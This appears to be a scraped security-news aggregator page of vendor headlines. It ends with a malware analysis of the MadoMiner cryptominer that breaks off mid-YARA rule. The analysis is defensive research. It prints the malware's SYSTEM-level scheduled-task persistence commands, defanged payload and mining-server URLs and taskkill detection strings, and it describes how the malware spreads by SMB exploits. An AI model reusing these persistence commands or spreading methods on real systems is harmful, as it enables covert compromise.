Threat News Ledger

News, opinion, advice and research on computer security threats from Sophos

Users were complaining this week after discovering they'd been logged in to Google’s Chrome browser automatically, after logging into a Google website.

AdGuard has taken the decision to reset all user accounts after suffering a credential-stuffing and brute-force password attack.

The ransomware attack on DC's outdoor surveillance cameras came just a few days before the 2017 inauguration of President Trump.

Two former Wendy’s employees want to know what the company does with employee fingerprints collected by biometric clocks.

What happens to sensitive customer data when a large company that has collected it over many years suddenly goes bust?

The EU justice commissioner said she's out of patience. Also, she quit Facebook because it's a "channel of dirt."

Google is still allowing third-party developers access to access its users’ Gmail data, it said in a letter to Senators last week.

The Massachusetts State Police (MSP) accidentally spilled some of its opsec onto Twitter last week, uploading a screenshot that revealed browser bookmarks.

It's just a number to detect fraud, not a Black Mirror-esque score that's going to rate us all as social misfits unworthy of wedding invitations.

From iOS security updates to Netflix phishing attacks, catch up with everything we've written in the last seven days - it's weekly roundup time.

Online headquarters of Kaspersky Lab security experts.

Average spam volume of 49.66% in world mail traffic in this quarter fell 2.16 p.p. in comparison with the previous reporting period, and the Antiphishing system prevented more than 107M attempts to connect users to phishing sites, which is 17M more than in the first quarter of 2018.

In the last few days, our anti-ransomware module has been detecting a new variant of malware - KeyPass ransomware. According to our information, the malware is propagated by means of fake installers that download the ransomware module.

Olympic Destroyer worm, Roaming Mantis mobile banker, Operation Parliament cyber-espionage campaign, SynAck ransomware and other notable targeted attacks and malware campaigns of Q2 2018.

In Q2 2018, attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 215,762 users, ransomware attacks were registered on the computers of 158,921 unique users.

It’s easy to notice if you've fallen victim to an advertising partner program: the system has new apps that you didn’t install, ad pages spontaneously open in the browser, ads appear on sites where they never used to, and so on. If you notice these symptoms on your computer, 99% of the time it’s “partner stuff”.

Kaspersky Lab ICS CERT has identified a new wave of phishing emails with malicious attachments targeting primarily companies and organizations that are, in one way or another, associated with industrial production.

Recently, an interesting miner implementation appeared on Kaspersky Lab’s radar. The malware, which we dubbed PowerGhost, is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers.

The growing popularity of car sharing services has led some experts to predict an end to private car ownership in big cities. But information security specialists have started raising some pertinent questions: how are the users of these services protected and what potential risks do they face in the event of unauthorized access to their accounts?

In H1 2018, the average and maximum attack power fell significantly compared to H2 2017. In Q2 2018, cybercriminals continued the above-outlined trend of searching for exotic holes in UDP transport protocols. It surely won’t be long before we hear about other sophisticated methods of attack amplification.

As researchers we interesting in developmental prototypes of malware that have had limited distribution or not even occurred in the wild. We recently came across one such sample: a macOS backdoor that we named Calisto.

Read, think, share … Security is everyone's responsibility

Bitcoin Core Software fixed a critical DDoS attack vulnerability in the Bitcoin Core wallet software tracked as CVE-2018-17144. The Bitcoin Core team urges miners to update client software with the latest Bitcoin Core 0.16.3 version as soon as possible. “A denial-of-service vulnerability (CVE-2018-17144) exploitable by miners has been discovered in Bitcoin Core versions 0.14.0 up […] The post Bitcoin Core Team fixes a critical DDoS flaw in wallet software appeared first on Security Affairs.

Another fashion retailer suffered a data breach, the victim is SHEIN that announces the security breach affected 6.42 million customers. The retailer hired a forensic cybersecurity firm as well as an international law firm to investigate the security breach. SHEIN is now notifying affected users and it is urging them to change the password for […] The post SHEIN Data breach affected 6.42 million users appeared first on Security Affairs.

The popular macOS expert and former NSA hacker has discovered a zero-day vulnerability in macOS on Mojave ‘s release day. It is always Patrick Wardle, this time the popular expert and former NSA hacker has found a zero-day flaw in macOS on Mojave ‘s release day. According to the expert, the implementation bug can be […] The post White hat hacker found a macOS Mojave privacy bypass 0-day flaw on release day appeared first on Security Affairs.

According to Akamai’s latest State of the Internet report on credential stuffing, credential stuffing continues to be growing threat. According to Akamai report titled “[state of the internet] / security CREDENTIAL STUFFING ATTACKS“  the credential stuffing attacks are a growing threat and often underestimated. Credential stuffing attacks involve botnets to try stolen login credentials usually obtained through phishing […] The post Akamai Report: Credential stuffing attacks are a growing threat appeared first on Security Affairs.

Researchers from ReversingLabs and Cisco Talos have uncovered a new Adwind campaign that targets Linux, Windows, and macOS systems. Security experts from ReversingLabs and Cisco Talos have spotted a new Adwind campaign that targets Linux, Windows, and macOS systems. Adwind is a remote access Trojan (RAT), the samples used in the recently discovered campaign are Adwind 3.0 RAT and […] The post Experts uncovered a new Adwind campaign aimed at Linux, Windows, and macOS systems appeared first on Security Affairs.

Cisco has patched a critical vulnerability in the Cisco Video Surveillance Manager (VSM) could be exploited by an unauthenticated remote attacker to gain root access. Cisco has fixed a critical vulnerability in the Cisco Video Surveillance Manager software running on some Connected Safety and Security Unified Computing System (UCS) platforms. The flaw could give an unauthenticated, […] The post Critical flaw affects Cisco Video Surveillance Manager appeared first on Security Affairs.

A security researcher discovered a bug affecting Firefox on Mac, Linux, and Windows that could crash the browser and in some cases the underlying OS. The security researcher Sabri Haddouche from Wire discovered a bug that affects Firefox on Mac, Linux, and Windows that could crash the browser and in some cases the underlying PC. Haddouche was focusing its […] The post Firefox DoS issue crashes the browser and sometimes the Windows OS appeared first on Security Affairs.

An issue in Twitter Account Activity API has exposed some users’ direct messages (DMs) and protected tweets to wrong developers. A bug in Twitter Account Activity API has exposed some users’ direct messages (DMs) and protected tweets to unauthorized third-party app developers. “We recently published a notice about a bug related to our Account Activity API that could have […] The post A bug in Twitter Account Activity API exposed users messages to wrong developers appeared first on Security Affairs.

The Port of Barcelona was hit by a cyber attack, fortunately, maritime operations had not affected. On September 20, 2018 morning, the Port of Barcelona was hit by a cyber attack that forced the operators of the infrastructure to launch the procedure to respond to the emergency. At the time of writing, there are no technical details about […] The post Hackers target Port of Barcelona, maritime operations had not affected appeared first on Security Affairs.

A new round of the weekly SecurityAffairs newsletter arrived! The best news of the week with Security Affairs. Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal 20% discount Kindle Edition Paper Copy Once again thank you! Cyber attack took offline flight display screens at […] The post Security Affairs newsletter Round 181 – News of the week appeared first on Security Affairs.

News, views, and insight from the ESET security community

Should schools and businesses do more to combat the shortfall of cybersecurity professionals by changing the hiring process for those interested in having a career in the industry? The post How to improve hiring practices in cybersecurity appeared first on WeLiveSecurity

Public speaking and presenting at conferences can be daunting for the majority of people but by including some subtle tricks, the speaker can deliver a stronger message The post The Occasional Orator Part 2 appeared first on WeLiveSecurity

The skimmer, injected into the store’s payment page, harvested credit-card details from the store’s online customers for more than a month The post Attackers crack Newegg’s defenses, slurp customers’ credit card data appeared first on WeLiveSecurity

ESET researchers uncover major banking fraud attempts - Week in security with Tony Anscombe The post Week in security with Tony Anscombe appeared first on WeLiveSecurity

ESET researchers have discovered new DanaBot campaigns targeting a number of European countries The post DanaBot shifts its targeting to Europe, adds new features appeared first on WeLiveSecurity

Instead, the three men will cooperate with law enforcement and – an area in which, it turns out, they already have quite some experience – the broader research community The post Mirai’s architects avoid prison thanks to work for FBI appeared first on WeLiveSecurity

Cybercrooks use bogus apps to phish six online banks and a cryptocurrency exchange The post Fake finance apps on Google Play target users from around the world appeared first on WeLiveSecurity

Speaking at conferences can be daunting for presenters but often it is about striking the right balance between content and delivery The post The Occasional Orator Part 1 appeared first on WeLiveSecurity

The screens in “key locations” are back up and running again, while the airport paid no ransom to return its systems to working order The post Bristol airport takes flight screens offline after apparent ransomware attack appeared first on WeLiveSecurity

Conversely, only a little over one-third of IT executives believe that their systems have never been hijacked to surreptitiously mine digital currencies The post One in three UK orgs hit by cryptojacking in previous month, survey finds appeared first on WeLiveSecurity

ESET researchers have discovered several third-party add-ons for the popular open-source media player Kodi. The first 100 days of GDPR reviewed. Also a look at how Microsoft addressed 61 security flaws in Windows in their Patch Tuesday release The post Week in security with Tony Anscombe appeared first on WeLiveSecurity

In its heyday, Kelihos comprised up to 100,000 compromised devices that were capable of blasting out billions of malware-laden emails every day The post Russian man accused of running Kelihos botnet pleads guilty appeared first on WeLiveSecurity

Taking advantage of the celebration of the Day of the Programmer, we share some audit tools to evaluate the security of your code The post Programmer’s Day: Resources to audit your code appeared first on WeLiveSecurity

ESET researchers have discovered several third-party add-ons for the popular open-source media player Kodi being used to distribute Linux and Windows cryptocurrency-mining malware The post Kodi add-ons launch cryptomining campaign appeared first on WeLiveSecurity

Microsoft and Adobe have each shipped out their scheduled batches of patches to address security flaws in their respective software The post Patch Tuesday: Microsoft plugs zero-day hole exploited by PowerPool appeared first on WeLiveSecurity

A domain name once left behind can catch up with you – by giving fraudsters access to a treasure trove of sensitive information The post Abandoning a domain name can come back to bite you, research shows appeared first on WeLiveSecurity

The several thousand glowing reviews that Adware Doctor had garnered prior to its removal were “likely fake”, researchers say The post Apple yanks top grossing app from Mac App Store for grabbing private user data appeared first on WeLiveSecurity

What impact has the new data protection directive had on businesses so far? The post 100 days of GDPR appeared first on WeLiveSecurity

PowerPool exploits zero-day vulnerability, Machine Learning and malware, plus susceptible power grids, all in the cybersecurity news with Tony Anscombe The post Week in security with Tony Anscombe appeared first on WeLiveSecurity

The UK’s flag carrier vows to compensate all customers who will lose out financially due to the incident The post British Airways suffers breach, 380,000 card details stolen appeared first on WeLiveSecurity

Far-fetched though it may sound, the answer is yes, according to researchers, who show that electrical grids and smart home appliances could make for a dangerous mix The post Could home appliances knock down power grids? appeared first on WeLiveSecurity

Malware from newly uncovered group PowerPool exploits zero-day vulnerability in the wild, only two days after its disclosure The post PowerPool malware exploits ALPC LPE zero-day vulnerability appeared first on WeLiveSecurity

All things labeled Artificial Intelligence (AI) or Machine Learning (ML) are making waves, but talk of them in cybersecurity contexts often muddies the waters. A new ESET white paper sets out to bring some clarity to a subject where confusion often reigns supreme The post Of ML and malware: What’s in store? appeared first on WeLiveSecurity

The adoption of the protocol’s secure variant has continued its growth spurt in recent months, crossing the 50-percent milestone for the first time ever The post Majority of the world’s top million websites now use HTTPS appeared first on WeLiveSecurity

The latest quickfire cybersecurity news including the Fortnite fallout with Google Play and increased security feature on Instagram The post Week in security with Tony Anscombe appeared first on WeLiveSecurity

The move is part of a three-pronged plan that is intended to bolster user trust and safety on the photo-sharing platform The post Instagram expands 2FA and account verification appeared first on WeLiveSecurity

For Android, malware detections were down 27% compared to the first half of 2017; for iOS, they decreased 15% compared to the same period last year The post Semi-annual balance of mobile security appeared first on WeLiveSecurity

The discovery was made barely two days after the release of a patch that fixes the critical flaw in the web application framework The post PoC targeting critical Apache Struts bug found online appeared first on WeLiveSecurity

After Epic Games shunned Google Play, debates about threats faced by Android users have taken on a whole new tenor. Joining us to add his voice to the mix is ESET Malware Researcher Lukáš Štefanko The post Lukáš Štefanko: I hope other app developers don’t follow Epic’s example appeared first on WeLiveSecurity

Stop us if you’ve heard this before: avoid installing apps from outside Google Play. But what if you’re itching to battle it out in Fortnite? The post Why now could be a good time to fortify your Android defenses appeared first on WeLiveSecurity

ESET’s Global Security Evangelist & Industry Ambassador Tony Anscombe is back with the latest quickfire cybersecurity news The post Week in security with Tony Anscombe appeared first on WeLiveSecurity

The Bugcrowd crowdsourcing platform launched Bugcrowd University, an educational platform for security researchers that aims to contribute to the development of bug hunting skills The post Bugcrowd University: The free educational platform for security researchers appeared first on WeLiveSecurity

Welcome to the first ever week in security video round-up. This weekly video will bring you some of the biggest industry news that we have covered here on WeLiveSecurity. The videos will be presented by ESET’s Global Security Evangelist & Industry Ambassador Tony Anscombe. The post Week in security with Tony Anscombe appeared first on WeLiveSecurity

The retailer says that whatever data the crooks have obtained, they weren’t stolen through a breach of its systems The post Superdrug targeted by miscreants who claim to have stolen customer data appeared first on WeLiveSecurity

The latest ESET research offers a rare glimpse into the mechanics of a particularly stealthy and resilient backdoor that the Turla cyberespionage group can fully control via PDF files attached to emails The post Turla: In and out of its unique Outlook backdoor appeared first on WeLiveSecurity

Internet-connected irrigation systems suffer from security gaps that could be exploited by attackers aiming, for example, to deplete a city’s water reserves, researchers warn The post Smart irrigation systems vulnerable to attacks, warn researchers appeared first on WeLiveSecurity

An overview of some of the cyberattacks that Canadian organizations faced in the summer months of 2018 The post A heated summer for cybersecurity in Canada appeared first on WeLiveSecurity

His lawyer claims that the teen did the hacking because he admired Apple and dreamed of landing a job in the company The post Australian schoolboy hacks into Apple’s network, steals files appeared first on WeLiveSecurity

The first week in security video round-up from WeLiveSecurity The post Week in security with Tony Anscombe appeared first on WeLiveSecurity

The newly-released report provides an overview of the data breach landscape in the first half of this year The post Some 2.6 billion data records exposed in first half of 2018 appeared first on WeLiveSecurity

If you’re an Instagrammer, you may want to take some basic precautions, such as picking a strong and unique password and signing up for two-factor authentication sooner rather than later The post Instagram users locked out of accounts en masse appeared first on WeLiveSecurity

Heralded as the answer to many cybersecurity issues, machine learning hasn’t always delivered The post Black Hat 2018: AI was supposed to fix security – what happened? appeared first on WeLiveSecurity

Unbeknownst to exploit writers, the seemingly mouth-watering bugs would be bogus and non-exploitable The post Can cramming code with bugs make it more secure? Some think so appeared first on WeLiveSecurity

Aiming to protect critical infrastructure against attacks The post Black Hat 2018: Protecting Industrial Control System appeared first on WeLiveSecurity

The golf association is said to have had little success with restoring access to its files so far The post Attackers grab hold of PGA of America files, demand ransom appeared first on WeLiveSecurity

All good things come to an end, and we’re rounding off our series of interviews to mark the 27th anniversary since computer scientist Tim Berners-Lee publicly announced the World Wide Web project The post Interviewing ESET’s experts about the Web’s journey so far – part 3 appeared first on WeLiveSecurity

The slew of vulnerabilities – since patched – were found without the use of automated testing tools The post Software bugs put nearly 100 million health records at risk of exposure appeared first on WeLiveSecurity

Today, we continue with our series of conversations with ESET’s security pros to hear what they have to say about the evolution of the World Wide Web since it was publicly announced 27 years ago The post Interviewing ESET’s experts about the Web’s journey so far – part 2 appeared first on WeLiveSecurity

The malware outbreak has even prompted concerns of delays in the shipments of the next wave of iPhones The post Apple chip supplier blames WannaCryptor variant for plant shutdowns appeared first on WeLiveSecurity

What has the journey of the World Wide Web been like so far, as seen and experienced by ESET’s security folk? ESET Senior Research Fellow David Harley provides his take in the first installment of our series of interviews marking the Web’s 27th birthday The post Interviewing ESET’s experts about the Web’s journey so far – part 1 appeared first on WeLiveSecurity

Protect Your Interwebs!

The US Federal Bureau of Investigation (FBI) just released a public service announcement (PSA) to the public about a large number of websites being exploited and compromised through WordPress plugin vulnerabilities: Continuous Web site defacements are being perpetrated by individuals sympathetic to the Islamic State in the Levant (ISIL) a.k.a. Islamic State of Iraq andRead More

Security Risk: Dangerous Exploitation level: Very Easy/Remote DREAD Score: 8/10 Vulnerability: Persistent XSS Patched Version:  1.4.4 During a routine audit for our Website Firewall (WAF), we discovered a dangerous Persistent XSS vulnerability affecting the very popular WP-Super-Cache plugin (more than a million active installs according to wordpress.org). The security issue, as well as another bug-fixRead More

Last year, we released a post about a malware injector found in an Adobe Flash (.SWF) file. In that post, we showed how a .SWF file is used to inject an invisible, malicious iFrame. It appears that the author of that Flash malware continued with this method of infection. Now we are seeing more varietiesRead More

Have you ever heard of the term PCI? Specifically, PCI compliance? If you have an e-commerce website, you probably have already heard about it. But do you really understand what it means for you and your online business? In this series, we will try to explain the PCI standard and how it affects you andRead More

Darkleech is a nasty malware infection that infects web servers at the root level. It use malicious Apache modules to add hidden iFrames to certain responses. It’s difficult to detect because the malware is only active when both server and site admins are not logged in, and the iFrame is only injected once a dayRead More

I joined Sucuri a little over a month ago. My job is actually as a Social Media Specialist, but we have this process where regardless of your job you have to learn what website infections look like and more importantly, how to clean them. It’s this idea that regardless of you are you must alwaysRead More

Today, with the proliferation of open-source technologies like WordPress, Joomla! and other Content Management Systems (CMS) people around the world are able to quickly establish a virtual presence with little to no cost. In the process however, a lot is being lost in terms of what it means to own a website. We are failingRead More

The last 7 days have been very busy with a number of vulnerabilities being disclosed on multiple WordPress plugins. Some of them are minor issues, some are more relevant, while others are what we’d categorize as noise. How are you supposed to make sense of all this? To help provide some clarity on the influxRead More

Trojan (or trojan horse) is software that does (or pretends to be doing) something useful but also contains a secret malicious payload that inconspicuously does something bad. In WordPress, typical trojans are plugins and themes (usually pirated) which may have backdoors, or send out spam, create doorways, inject hidden links or malware. The trojan modelRead More

Security Risk: Critical Exploitation level: Very Easy/Remote DREAD Score: 9/10 Vulnerability: Password bypass / Privilege Escalation Patched Version:  2.0.9.2 During a routine audit of our Website Firewall (WAF), we found a critical vulnerability affecting the popular MainWP Child WordPress plugin. According to worpdress.org, it is installed on more than 90,000 WordPress sites as as remote administrationRead More

Emerging threats and malware research

We’ve been tracking some more spam dropping Zepto ransomware variants. Like earlier posts, we’re seeing infected attachments with malicious macro scripts used as the entry point for the threat actor. (See images below of some recent spam samples.) As we dig deeper into our analysis, we found out that these macro scripts are not crafted […] The post Zepto Evasion Techniques appeared first on ThreatTrack Security Labs Blog.

Recently, we’ve spotted Zepto ransomware spreading through spam email containing fake invoices (see image below). These attachments contain a Macro-Enabled word document file known as Donoff, which downloads the Zepto executable that encrypts all your files and will later ask for payment of the decryption key. We decided to take a closer look on the Donoff […] The post Donoff Macro Dropping Ransomware appeared first on ThreatTrack Security Labs Blog.

ThreatTrack Labs has recently observed a surge of spam containing a zip attachment with a WSF (Windows Scripting File) to deliver Zepto ransomware. This tactic is a change from the common JavaScript and macro documents being spammed previously. Here are actual emails featuring familiar social engineering tactics: The zip attachments contain the WSF.   An Interactive […] The post Zepto Ransomware Packed into WSF Spam appeared first on ThreatTrack Security Labs Blog.

Reports of a Zero-day attack affecting numerous Office 365 users emerged late last month (hat tip to the researchers at Avanan), and the culprit was a new variant of the Cerber ransomware discovered earlier this year. As with the other Zero-day threats that have been popping-up like mushrooms of late, the main methods of infection […] The post A Look at the Cerber Office 365 Ransomware appeared first on ThreatTrack Security Labs Blog.

TeslaCrypt is yet another ransomware taking the cyber world by storm. It is mostly distributed via a spear phishing email and through the Angler exploit kit. The Angler exploits vulnerability in Adobe Flash. The Angler exploit downloads a variant of the ransomware upon success. TeslaCrypt 3.0 possesses various updates, one of which renders encrypted files […] The post A Close Look at TeslaCrypt 3.0 Ransomware appeared first on ThreatTrack Security Labs Blog.

It’s been the norm in the cybersecurity industry to be intrigued and at the same time be infuriated by the people behind any successful large-scale malware attack. Ransomware is one such example. It’s been slowly released in the wild since the early 2009, but CryptoWall redefined the meaning of ransomware and took it to the […] The post The Day the Earth Stood Still for CryptoWall appeared first on ThreatTrack Security Labs Blog.

It is one of the most prevalent spam malware in the wild today: Locky ransomware. The Locky malware authors started their campaign last year but didn’t become very active until January 2016 – and they haven’t slowed down since. Locky e-mails usually come in with an attached zip archive and once extracted may contain a […] The post Understanding the Latest Version of Locky Ransomware appeared first on ThreatTrack Security Labs Blog.

Ransomware has become an increasingly serious threat. Cryptowall, TeslasCrypt and Locky are just some of the ransomware variants that infected large numbers of victims. Petya is the newest strain and the most devious among them. Petya will not only encrypt files but it will make the system completely useless, leaving the victim no choice but […] The post A Glimpse at Petya Ransomware appeared first on ThreatTrack Security Labs Blog.

Security researchers recently discovered that the power outage in the Ukraine in December was caused by a malware and identified as an evolved version of BlackEnergy. This Trojan, dating back to 2007, was a popular malware that was previously sold in Russian underground sites. However, its design and architecture changed from performing simple HTTP DDos attacks to […] The post Breaking Down the Malware Behind the Ukraine Power Outage appeared first on ThreatTrack Security Labs Blog.

Credit: Christopher D. Del Fierro, Lead Malware Research Engineer, ThreatTrack Security We have seen Dridex since 2014 and it is still active in the wild today. This research will be focusing on analyzing Dridex and on how it is able to remain undetected by most antivirus engines. For those not familiar with Dridex, it is a malspam […] The post What’s New with Dridex appeared first on ThreatTrack Security Labs Blog.

The most recent posts from across the AlienVault blogs.

At Black Hat 2018, we surveyed attendees on diverse topics ranging from how to react to extortion, what impact the geopolitical landscape is having on the industry, and whether the shiny veneer of the cloud is beginning to fade. Our Security Advocate, Javvad Malik, has put together an excellent report on the survey. The report is based on our survey at the AlienVault booth of 963 participants at Black Hat 2018 and interviews with security experts. Read the whole report by Javvad. Key Findings 38% say the Chief Information Security Officer (CISO) should be the one to negotiate extortion and/or ransom demands 46% of those surveyed say security remains the biggest blocker to cloud adoption 54% of participants believe US public sector infrastructure is either unprepared or very unprepared to defend against cyber attacks People are relatively confident in calling a hacker's bluff: Read the report for all the details!       

2018 seems to be a time for highly profitable cryptominers that spread over SMB file-shares.  Following my analysis on ZombieBoy in July, I found a new malware sample that I’m calling MadoMiner.  With the help of Chris Doman, I was able to analyze it to discover that it uses techniques similar to ZombieBoy, because it hijacks Zombieboy’s CPUINFO.exe.  However, MadoMiner is much, much, larger, in terms of: The size of the malware; The amount of systems infected; and Total profit gained by the attackers. The previously analysed ZombieBoy was earning around $750 a month, while mining at its maximum power.  MadoMiner, on the other hand, is earning around $6015 a month, while only mining at 50% power: Malware Analysis An overview of the Install module is below.  Depending on the victim’s architecture, obtained from CPUInfo.exe, either x86.dll or x64.dll is installed: X86.dll and x64.dll are virtually identical just one is specifically for x86-x64 OS architecture and one is specifically for x86 OS architecture. Domains MadoMiner appears to use two different servers to distribute payloads for each module. http://da[dot]alibuf.com:3/ http://bmw[dot]hobuff.info:3/ In addition, in Mask.exe, the second module, here are some identified mining servers used by MadoMiner: http://gle[dot]freebuf.info http://etc[dot]freebuf.info http://xmr[dot]freebuf.info http://xt[dot]freebuf.info http://boy[dot]freebuf.info http://liang[dot]alibuf.com http://dns[dot]alibuf.com http://x[dot]alibuf.com Exploits During the execution of the Install module, MadoMiner makes use of several exploits: CVE-2017-9073, RDP vulnerability on Windows XP and Windows Server 2003 CVE-2017-0143, SMB exploit CVE-2017-0146, SMB exploit Installation MadoMiner begins on a victim’s computer as a DLL installed by the EternalBlue/DoublePulsar exploits. Depending on OS architecture, you’ll either find x86.dll or x64.dll installed on your computer.  Both are basically the same, just adjusted for operating system. Just like ZombieBoy, MadoMiner makes use of a heavily modified version of ZombieBoyTools in order to install its DLL.  The reason for this it seems, is that the CPUInfo.exe dropped by the Install module of MadoMiner appears to be the same CPUInfo.exe dropped by an earlier version of 64.exe, a module from ZombieBoy (similar to current day CPUInfo in ZombieBoy, sans embedded miner and anti-VM guards). In fact, if CPUInfo.exe in MadoMiner is ran without the surrounding Install module, it will attempt to communicate with ZombieBoy’s servers and ultimately install ZombieBoy Packet showing malware communicating to ca[dot]posthash.org:443 Setup Once either x86.dll or x64.dll is successfully installed and executed on  a victim’s computer, several actions are performed.  First, 2 UPX packed modules are downloaded from da[dot]alibuf.info, known locally as Install.exe and Mask.exe(for x86.dll, 445.exe & mado.exe; for x64.dll, mask.exe & dst.exe). These modules are both executed concurrently and are in charge of all functionality of the malware. Install.exe Install.exe is a curious module.  Installed to ‘C:\%Windows Directory%\Install.exe’ from either http://da[dot]alibuf.com:3/445.exe or http://da[dot]alibuf.com:3/mask.exe, Install.exe seems to be in charge of spreading MadoMiner to more systems.  MadoMiner spreads to other systems by hijacking ZombieBoy’s CPUInfo.exe.  Install.exe consists of a couple batch scripts for persistence and evasion, a dropper, CPUInfo.exe, and 2 dlls, x86.dll and x64.dll.  What MadoMiner does with these dll’s and CPUInfo.exe is particularly unique.  CPUInfo.exe on its own drops over 70+ files to IIS, including the 2 dll’s that it installs on computers, x86.dll and x64.dll. In its base form, these dll’s contain the ZombieBoy installation.  MadoMiner writes over CPUInfo.exe’s x86.dll and x64.dll with its own dlls.  When CPUInfo.exe goes to install the dlls, it installs MadoMiner’s dlls instead! Install.exe also runs 2 tasks for persistence, RavTask and GooglePingInConfigs.  The first task,  RavTask, and runs every 4 hours, indefinitely.  RavTask runs a batch file dropped by Install.exe called Free.bat that will be discussed more below.  GooglePingInConfigs’ job is simple; all it has to do is run CPUInfo.exe at startup.  The commands for starting Ravtask and GooglePingInConfigs are as follows: ‘@schtasks /create /sc minute /mo 240 /tn “RavTask /tr “C:\windows\IIS\free.bat” /ru “system” /f’ ‘@schtasks /create /tn “GooglePinginConfigs” /tr “C:\Windows\IIS\CPUInfo.exe” /sc onstart /ru “system” /f’ Install.exe batch scripts Install.exe has 3 batch scripts that it uses in its runthrough.  Free.bat, DemO.bat, DemC.bat.  Dem(open) or Demo.bat is used at the beginning, when Install.exe is first launched, Free.bat is used by RavTask, and Dem(close) or DemC.bat is used at the end of install.exe’s runthrough. DemO first sets a task named Schedule to autorun.  Next, it deletes and then recreates the 2 tasks used for Persistence --- Ravtask and GooglePingInConfigs.  Finally, access is removed from RavTask and GooglePingInConfigs, RavTask is run, and then the script deletes itself. DemO.bat Free.bat, which is executed by RavTask every 4 hours, is a small batch script with a fairly important job.  First, Free.bat ends any of the programs/dlls used by CPUInfo.exe including DoublePulsar and EternalBlue(This is done to guarantee a clean start).  Next, Free.bat runs GooglePingInConfigs (which will execute CPUInfo.exe).  In addition, Free.bat also checks to make sure the NIC is up by pinging it. Free.bat Finally, DemC is ran to hide the malware and appears to be a partial wiper module.  For example, if the malware detects a VM, DemC is ran.  DemC closes a lot of open processes, in addition to deleting some of the modules dropped by MadoMiner.  Also, DemC deletes all executables in the ProgramData folder. x64 and x86 - The Hijacking Dlls x64.dll and x86.dll start their journey packed into Install.exe.  When Install.exe is ran however, they are dropped in C:\Windows\IIS with CPUInfo.exe, however when attempting to access either x86.dll or x64.dll, access is denied.  This is so that CPUInfo.exe does not overwrite x86.dll and x64.dll while executing.  As for the dll’s themselves, they each have a check to determine that you are indeed their respective OS type.  If so, they download their specific malware (mask.exe and dst.exe for x64.dll;445.exe and mado.exe for x86.dll) from their download server and run WinExec to run the applications. x86.dll urldown function CPUInfo.exe - The Hijacked malware CPUInfo.exe is very similar to the CPUInfo.exe used by ZombieBoy.  In fact, I believe it to be an earlier version of CPUInfo.exe before ZombieBoy packed the miner with CPUInfo.exe and made it impossible to run on a VM(Running CPUInfo.exe without running Install.exe first causes ZombieBoy to be dropped).  Just like in ZombieBoy, CPUInfo.exe drops over 70+ files into C:\Windows\IIS.  These files contain the exploits used, ZombieBoyTools, the web scanner, a copy of CPUInfo.exe, the 2 dlls used to spread (x86.dll and x64.dll). In addition, CPUInfo.exe appears to have some keylogger functionalities, just like in ZombieBoy.  A static strings analysis shows that CPUInfo.exe imports a lot of commands used for keylogging, such as SetWindowHookEx and GetKeyState. CPUInfo.exe is the main payload of Install.exe and all of the other files in Install.exe seem to support CPUInfo in one way or another.  As we’ve seen, x64.dll and x86.dll are both used to spread MadoMiner, but how it all comes together is quite interesting. CPUInfo.exe - Runthrough When CPUInfo first launches, it connects to ip[dot]3322.net  in order to obtain the public IP netrange. Next, CPUInfo.exe obtains regional info about the host using www[dot]ip138.com. As this is happening, CPUInfo.exe is also unpacking itself, dropping a total of 3 exploits, a web scanner, the batch scripts for scanning the files, as well as necessary dll’s and other misc files adding up to over 70 files into C:\windows\IIS.   After dropping the necessary files and obtaining the IP netrange, CPUInfo.exe begins to use the lightweight TCP web scanner, WinEggDrop, in order to scan all private IP’s from XXX.XXX.0.0 - XXX.XXX.255.255 to identify an IP with port 445 open.  If said IP is located, this ip is extracted and saved into com.dll for future use and then a heavily modified version of ZombieBoyTools is ran.  This version of ZombieBoyTools identifies the OS architecture and then, using either EternalBlue/DouplePulsar or EternalChampion/DoublePulsar, installs and executes either x86.dll or x64.dll(after extracting the saved IPs from com.dll).  This starts the infection process on a new host, running and downloading the Install and Mask modules. Batch script to scan Private IP’s. After finishing the private IP infection stage, CPUInfo.exe then moves onto the private IP infection stage, which is nearly identical to the public IP infection stage, except that CPUInfo.exe does not need to obtain the private IP again, since the value is already saved in memory.  When scanning the private IP, it also follows the same scan pattern as the public IP scan. Avoidance and Removal - Install.exe Install.exe uses several NSA exploits, just like ZombieBoy.  In fact, if your computer is patched for ZombieBoy, you’ll also be patched for MadoMiner.  Specifically, the patch that will protect you from MadoMiner is MS17-010.  In addition, you’ll want to block traffic to the following web servers (ip’s are subject to change unfortunately, so I’ve provided the alphanumeric address instead): http://alibuf[dot]com:3/ (distribution server) http://hobuff[dot]info:3/ (Distribution server) http://freebuf.info (Mining server) While I always advocate avoidance as the best practice sometimes that just isn’t possible.  As always, if you become infected by MadoMiner, do not panic.  However, you should backup any important files now, if you haven't already.  MadoMiner has a nasty trap that when CPUInfo closes, it sometimes triggers demC.bat, which is Install.exe’s wiper module, in which it deletes any suspicious files for anti-analysis. The key deleted/changed files/settings are: Remove ownership from ftp.exe Delete host file and then remake it, saving “127.0.0.1 localhost” to it Flush dns Delete several services that may be from past campaigns. Delete all executable files in C:\%ProgramData%\ Make C:\Progra~1\dll Stop all running modules from MadoMiner In addition, MadoMiner appears to take advantage of the IFEO.  Anytime the modules are executed, taskkill.exe /f is ran as a debugger, killing the module In addition, unless you use port 445, all traffic into and out of it should be blocked. While I am including a chart with all of the installed modules of MadoMiner in total, the amount of files installed by both are too large to fit into one analysis, so in this part I will cover in depth the steps to remove Install.exe. Note:  This requires safe mode! One of CPUInfo.exe’s batch files will delete a lot of files in ProgramData, in addition to other important files on CPUInfo.exe’s close.  Be careful, and back up any important files before attempting this.  Since MadoMiner installs 2 jobs, those jobs will need to be deleted from either HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\Taskcache\Tasks or HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\Taskcache\Tree.  The jobs are known as RavTask and GooglePingInConfigs. In addition, if you open Task Scheduler and go to the scheduled tasks, you should delete the “action” field from the jobs, so that they are rendered null and void. Also, you should delete DemC.bat and DemO.bat from C:\%WindowsDirectory%\ along with Install.exe and \IIS. You should then be able to run your favorite Antivirus software in order to scan for any remaining artifacts. Detection Yara Rule rule MadoMiner_Install { meta: author = “quinnjp13@gmail.com reference = "https://www.virustotal.com/#/file/1a90dbc1db60930614a1e78b9ecfff4d772d48c4d08e9c66986b695316253062/" strings: $string_1 = "d09f2340818511d396f6aaf844c7e325" nocase wide ascii $string_2 = "tem.vbs" nocase wide ascii $string_3 = 'taskkill /f /t /im CPUInfo.exe' nocase wide ascii $string_4 = '@taskkill /f /t /im svshostr.exe' nocase wide ascii $string_5 = 